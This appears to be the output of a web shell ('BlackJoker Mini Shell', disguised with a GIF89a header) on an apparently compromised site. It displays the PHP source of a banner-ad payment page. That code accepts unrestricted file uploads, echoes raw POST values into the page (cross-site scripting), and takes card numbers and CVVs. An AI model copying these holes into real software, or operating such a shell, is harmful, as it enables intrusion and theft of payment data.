GIF89a; Mini Shell

Mini Shell

Direktori : /home/serb/www/
Upload File :
Current File : /home/serb/www/advertise-bannerpayment.php

<? session_start();
 include("lib/globals.php");
 include("lib/common.php");
 include("lib/functions.php");
 ?>
<? include "includes/header_top.php";?>
<?
	if($_POST)
	{
		
		
		if($_FILES['avt_image']['tmp_name'])
			{
				$manu_imagename1=time().$_FILES['avt_image']['name'];
				move_uploaded_file($_FILES['avt_image']['tmp_name'],'banner/'.$manu_imagename1);
		    }
		
				
	}

?>
<script language="javascript">

function openavt2()
{
	
	  document.getElementById('avt2').style.display="block";
	  document.getElementById('avt1').style.display="none";
	
}
function openavt3()
{
	  document.getElementById('avt3').style.display="block";
	  document.getElementById('avt2').style.display="none";
	  document.getElementById('avt1').style.display="none";
}


</script>
<body>
<? include "includes/header.php";?>
 
<div class="main_bg">

 		<div style="height:32px; width:1000px;">
        	        
        </div>
        <div  style="width:1000px; margin:0 auto;">
        	<div class="statedetails">
                	<div class="stdtls_header">
                    	Advertise -<span style="color:#000;">Banner Ad </span>                 	
                    </div>
                    <div class="stdtls_midder">
                    	<div style=" width:960px; margin:0 auto;"><br/>
                        	<div class="seftyleft">
                                <br/>
                                    <img src="images/100safe.png" />
                                 <p class="notetext">NOTE</p>
                                 <p class="noteans">
                                 	Chose your desired package then click the red botton.<br/><br/>You can pay by Visa, Mastercard and Masstro credit cards.<br/><br/>
                                 
                                 </p>
                                
                            </div>
                            <div class="bannermid">
                            <form action="ad-bannerprocess.php" method="post" name="f1" style="margin: 0px; padding: 0px;" enctype="multipart/form-data" onSubmit="return validate();">
                                 <input name="submit_form" value="1" type="hidden">
                            	                                
                                <div style="width:649px; margin:0 auto;" id="avt3">
                                	<table border="0" cellpadding="0" cellspacing="6" style="margin:0 auto;">
                                                                                                     
                                        <tr>
                                          <td colspan="3" class="naote_style">
                                          	Payment Details : You are paying for your Personal Banner Advertisement.
                                          </td>
                                         
                                         </tr>
                                        
                                        <tr height="10">
                                          <td></td>
                                          <td></td>
                                          <td></td>
                                         </tr>
                                                                                
                                          <tr>
                                          <td class="jointext222">Name On Card :</td>
                                          <td style="text-align:left;"><input name="cardName" id="cardname" class="main_input"   type="text"></td>
                                          <td></td>
                                         </tr>
                                         <tr>
                                          <td class="jointext222">Card Number :</td>
                                          <td style="text-align:left;"><input name="cardNumber" id="cardNumber" class="main_input"   type="text"></td>
                                          <td></td>
                                         </tr>
                                        
                                         <tr>
                                          <td class="jointext222">&nbsp;Expiration Date :</td>
                                
                                         <td style="text-align:left;"> <select name="expMonth" class="drp_img3" style="width:80px;">                 
                                
                                
                                
                                                    <option value="">Month</option>
                                
                                                    <option value="January">1: Jan</option>
                                
                                                    <option value="February">2: Feb</option>
                                
                                                    <option value="March">3: Mar</option>
                                
                                                    <option value="April">4: Apr</option>
                                
                                                    <option value="May">5: May</option>
                                
                                                    <option value="June">6: Jun</option>
                                
                                                    <option value="July">7: Jul</option>
                                
                                                    <option value="August">8: Aug</option>
                                
                                                    <option value="September">9: Sep</option>
                                
                                                    <option value="October">10: Oct</option>
                                
                                                    <option value="November">11: Nov</option>
                                
                                                    <option value="December">12: Dec</option>
                                
                                
                                
                                                 </select>
                                
                                
                                
                                              <span style="color:#fff;">  Year</span>   <select name="year" class="drp_img3" style="width:80px;">
                                
                                                            <option value="">Year</option>
                                
                                                    <?
                                
                                                        for($i=2014; $i<=2040; $i++){
                                
                                                    ?>
                                
                                                    <option value="<?=$i?>"><?=$i?></option>
                                
                                                    <? }?>
                                
                                                </select>
                                
                                
                                
                                                    </td>
                                
                                          <td></td>
                                         </tr>
                                         <tr>
                                          <td class="jointext222">CVV2/CVC2 :</td>
                                          <td style="text-align:left;"><input name="cvvcode" id="cvvcode" class="main_input"   type="text"></td>
                                          <td></td>
                                         </tr>
                                        
                                         <tr>
                                          <td></td>
                                          <td>
                                           <input src="images/submit.png" type="image"  style="margin-left:20px;"/>
                                           <input type="hidden" name="fname" value="<?=$_POST['fname']?>">
                                           <input type="hidden" name="lname" value="<?=$_POST['lname']?>">
                                           <input type="hidden" name="address" value="<?=$_POST['address']?>" />
                                           <input type="hidden" name="city" value="<?=$_POST['city']?>" />
                                           <input type="hidden" name="zipcode" value="<?=$_POST['zipcode']?>" />
                                           <input type="hidden" name="visitor_country" value="<?=$_POST['visitor_country']?>" />
                                           <input type="hidden" name="manu_imagename1" value="<?=$manu_imagename1?>" />
                                           <input type="hidden" name="weblink" value="<?=$_POST['weblink']?>" />
                                           <input type="hidden" name="target_country" value="<?=$_POST['target_country']?>" />
                                           <input type="hidden" name="bannerprice" value="<?=$_POST['bannerprice']?>" />
                                           
                                          </td>
                                          <td></td>
                                         </tr>
                                        
                                         <tr>
                                          <td></td>
                                          <td></td>
                                          <td></td>
                                         </tr>
                                        </table>
                                </div>
                                </form>
                            </div>
                            <div class="bannerrules">
                            	<table border="0" cellpadding="0" cellspacing="0" style="margin:0 auto;">
                                	<tr height="10"></tr>
                                    <tr>
                                    	<td class="freetext2"><img src="images/signuparrow.png" /> Our Country</td>
                                    
                                    </tr>
                                    <tr height="6"></tr>
                                    <tr>
                                    	<td class="freetext2"><img src="images/signuparrow.png" /> Random Position</td>
                                    
                                    </tr>
                                    <tr height="6"></tr>
                                    <tr>
                                    	<td class="freetext2"><img src="images/signuparrow.png" /> 200 x 200 px size</td>
                                    
                                    </tr>
                                    <tr height="6"></tr>
                                    <tr>
                                    	<td class="freetext2"><img src="images/signuparrow.png" /> Max 150kb</td>
                                    
                                    </tr>
                                    <tr height="6"></tr>
                                    <tr>
                                    	<td class="freetext2"><img src="images/signuparrow.png" /> Banner & url Change</td>
                                    
                                    </tr>
                                    <tr height="45"></tr>
                                    <tr>
                                    	<td class="morelink22">
                                        	More info about Banner Advertisement
                                        </td>
                                    
                                    </tr>
                                
                            	</table>
                            </div>                                                   
                           <br class="spacer" />
                           	       	
                        </div>
                    
                    </div>
                    <div class="stdtls_footer"></div>
                </div>
            
              </div>
            
        </div>

<? include "includes/footer.php";?>

./BlackJoker Mini Shell 1.0